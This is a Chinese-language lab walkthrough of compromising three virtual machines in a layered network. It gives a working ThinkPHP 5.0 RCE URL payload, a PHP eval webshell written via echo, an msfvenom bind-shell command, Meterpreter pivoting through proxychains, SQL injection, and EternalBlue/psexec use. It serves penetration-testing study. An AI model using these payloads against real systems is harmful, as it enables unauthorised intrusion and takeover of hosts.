CFS三層網絡環境靶場實戰

一、環境搭建：

①根據作者公開的靶機信息整理

共有三個targets，目標是拿下三台主機權限，且是三層的網絡環境，內網網段有192.168.22.0/24和192.168.33.0/24，添加兩張僅主機模式網卡，配置如下：

 

 

 

 

②虛擬機網卡設置

target1(centos) 雙網卡模擬內外網：

外網：192.168.1.3，橋接模式

內網：192.168.22.128，僅主機模式

 

 

 

target2(ubuntu) 雙網卡存在兩個內網網段：

內網1：192.168.22.22，僅主機模式

內網2：192.168.33.22，僅主機模式

 

 

 

target3(win7) 單網卡僅內網：

內網：192.168.33.33，僅主機模式

 

 

 

 

開啟web服務環境：

寶塔后台登陸地址及密碼：

http://靶機外網ip:8888/a768f109/

賬號：eaj3yhsl，密碼：41bb8fee，根據實際靶機ip，配置即可，我的配置如下：

 

 

 

 

 

二、滲透實戰：

0x01 target1：

①信息收集

 

nmap 192.168.1.3 -sV -T4

 

 

 

 

訪問80端口，發現是thinkphp5.0

 

 

 

②tp5.0 rce Getshell

index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 

 

 

直接使用echo寫websehll(注意：linux下使用\轉義$，windows下用^轉義)：

http://192.168.1.3/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php eval(\$_POST[cmd]);?>" >shell.php

 

 

 

 

③MSF上線

我這里使用web_delivery模塊一句話上線，因為方便，我懶...

 

 

 

利用蟻劍執行即可上線：

 

 

 

 

 

④橫向移動

查看ip信息，發現有兩個網卡

 

 

 

 

添加路由、socks代理，進行橫向移動

 

 

 

 

添加成功

 

 

 

 

開啟socks5代理

 

 

 

 

 

⑤存活主機探測

發現一台ip為192168.22.22的主機，並且開啟了80端口，應該是web服務

 

ok，target1就到此結束...

 

0x02 target2：

①信息收集

proxychains nmap 192.168.22.22 -sT -T4 -Pn

 

 

 

 

配置瀏覽器的socks5代理，訪問80端口

 

 

 

 

是一個叫什么八哥CMS搭建的(沒聽過...)

 

 

 

②目錄掃描

proxychains dirb http://192.168.22.22/

掃出一個robots.txt，發現有兩個admin的目錄

 

發現是一個后台登陸界面，爆破就先不打算(除非萬不得已)

 

 

 

 

等待了一會dirb的掃描結果，也沒其他重要的目錄，就從頁面源代碼收集一下信息吧，竟然直接給出了注入點...

 

 

 

③注入-->后台登陸

既然給出了注入點，那就直接sqlmap一把梭

proxychains sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch

但是sqlmap一直無法連接url，就像這樣....具體啥原因還不清楚...

 

 

 

 

所以就換成了超級sql注入工具(可配置socks代理)

 

 

 

 

獲取到admin表的賬號密碼，解密為：123qwe

 

 

 

 

然后成功登陸后台

 

 

 

④模板Getshell

巡視了一下后台的功能點，發現有熟悉的模板功能，發現可以直接修改文件

 

 

 

修改tag下的index.php文件，插入webshell

 

 

 

蟻劍添加socks代理后連接webshell

 

 

 

 

⑤MSF上線

生成一個bind正向連接的馬

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=6666 -f elf -o test.elf

 

上傳到目標服務器

 

 

 

給執行權限，並執行

 

 

 

MSF開啟監聽，即可收到會話

set payload linux/x86/meterpreter/bind_tcp set lport 6666 set rhost 192.168.22.22 run

 

 

查看網卡配置，發現又多了一個192.168.33.0/24的網段

 

 

 

⑥添加路由和socks代理

添加多一個socks代理，注意要換一個端口

 

 

 

 

 

 

⑦探測存活主機

發現一台192.168.33.33存活主機

 

 

 

0x03 target3

①信息探測

proxychains nmap -Pn -sT -T4 192.168.33.33

開放了445和3389，無疑是windows了

 

 

②漏洞利用

永恆之藍肯定要試試的，畢竟emm....舒服嘛hahah，注意payload使用bind直連

使用ms17_010_eternalblue打失敗了

 

 

嘗試另一個利用模塊psexec的，成功拿下target3

 

 

 

三、總結：

總體來說這個靶機還是學到了挺多的，完整地體現了，是如何一步步利用跳板代理橫向到最深處網絡...

①Thinkphp5.x Rce漏洞利用，echo寫馬地注意事項

②MSF添加路由和socks代理，將Linux主機作為跳板從而橫向移動

③八哥CMS的漏洞利用Getshell，sql注入-->后台管理登陸，后台模板Getshell

④Ms17-010的psexec利用模塊的使用

⑤典型的三層網絡環境，通過利用MSF強大的路由功能，不斷添加路由+socks代理，橫向移動到最后一層網絡